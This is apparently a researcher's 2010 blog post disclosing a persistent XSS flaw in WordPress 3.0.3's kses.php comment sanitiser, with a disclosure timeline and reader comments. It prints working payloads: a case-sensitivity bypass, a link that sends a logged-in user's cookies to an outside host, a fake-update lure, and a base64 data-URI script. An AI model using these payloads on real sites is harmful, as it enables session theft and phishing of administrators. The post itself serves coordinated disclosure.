Hello guys! :)
A new version of Wordpress has been released few hours ago, as you can see from here. It fixes a critical vulnerability, so that the wordpress twitter profile called it "the most important security release of the year" (tweet).
[+] Plaintext advisory

I want to show you some details about this vulnerabilty (I discovered), actually it could be really dangerous to not update your wordpress blog. Other contributions come from Jon Cave (duck_), he is a Wordpress core contributor.


I report some extract of the mail I sent to the Wordpress security team.
The default install of Wordpress 3.0.3 allows to insert comments like the following in order to publish a link to other sites:

<a href="http://site.it">click me</a>

The protocol check is done when the href attribute is written in lower case, so an attacker
should insert any kind of protocol into the attribute href with a vector like the following:

<a HREF="javascript:alert(0)">click me</a>

This is a very bad way to sanitize HTML! We can bypass the protocol filtering process by exploiting a case sensitive matching. It is also possible to steal cookies of a logged user in a trivial way:

<a HREF="javascript:open('http://example.com/?cookie=' + document.cookie)">jjj</a>

I can also realize a more effective attack, as inserting something like this:

<a HREF="javascript:eval(document.getElementById('site-title').innerHTML+=' IMPORTANT WORDPRESS UPDATE, go to badsite.com to download it!');">nice site</a>

An inexperienced admin could click on the link and see a fake update alert on its private section. That is very very bad! Take a look at the screenshot to have an idea..

Wordpress needs an acceptation for each comment, but a "stupid" administrator could
allow a kind of fake comment, which looks fine, or he could simply click on the injected link.

So why am I not using a simple obfuscation method?! Actually the base64 encoding is perfect in this case:

<a HREF="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==">click here</a>

The issue was in the kses.php, that is the HTML sanitation library. The protocol check should be done in any case. Lower case or upper case, do not matter. You can find all further information about the fix here. As you can see the strtolower($attrname) function has been used to overcome the issue.

Disclosure timeline

20101219 Vendor contact
20101220 Vendor proposes a patch
20101220 The patch is ok in my opinion
20101220 Vendor takes time to fully audit and test kses.php
20101229 Wordpress 3.0.4 release

I wish you a happy new year :)

12 Responses to Persistent XSS vulnerability - wordpress 3.0.3 (kses.php)

  1. 134 Tom 2010-12-30 8:00 pm

    Great and useful hints. Thanks a lot.

  2. 135 Blays 2010-12-30 8:03 pm

    Complimenti e grazie da un grande utilizzatore di wordpress :)

  3. 141 nora 2010-12-31 9:38 am


    Does this vulnerability is for the news posts (in the admin panel) and the comments on a post too?
    Kind regards

  4. 156 sneak 2011-01-01 6:09 pm

    Hello nora, this vuln is for the comments filter!

  5. 161 gino 2011-01-03 7:46 pm

    there is another xss vulnerability also with this new wp version 3.0.4
    look here http://pastebin.com/VSbnX3nk

  6. 162 sneak 2011-01-04 9:22 am

    Naah, that was a *false* issue!
    Info at http://wpdevel.wordpress.com/2010/12/31/the-published-exploit-for-wordpress-3-0-4-isnt-accurate/

  7. 207 yud 2011-01-12 4:37 am

    what a good job, you've done

  8. 209 simon 2011-01-13 3:56 am

    Hi mate,
    If I didn't click those links, it won't be a matter, right?
    Because when I saw those spam comments, I usually delete it directly.. I really want to update to 3.04, but I don't think all those add-ons would be compatible

  9. 210 sneak 2011-01-13 3:24 pm

    Hi Simon, if you don't click on those links, then you are not completely safe!
    Infact the issue remains: a user, who visits your blog, can click on a malicious link, which is contained in a post comment!
    So you have to be really careful while approving a comment!

    > I don't think all those add-ons would be compatible

    Sorry, but I don't know that. Ask to the Wordpress team.

  10. 1373 Mathieu 2011-09-01 9:27 am

    Great hint, thanks!
    I'm using a lot of WP sites to promote my customers activities and I was not aware of this vulnerability.
    That's all good news!

  11. 1374 Michelle 2011-09-03 1:14 pm

    That's not where the issues end. http://pastebin.com/VSbnX3nk exposes another xss vulnerability in version 3.0.4

  12. 1378 sneak 2011-09-05 7:26 pm

    @Michelle http://wpdevel.wordpress.com/2010/12/31/the-published-exploit-for-wordpress-3-0-4-isnt-accurate/

Main Pages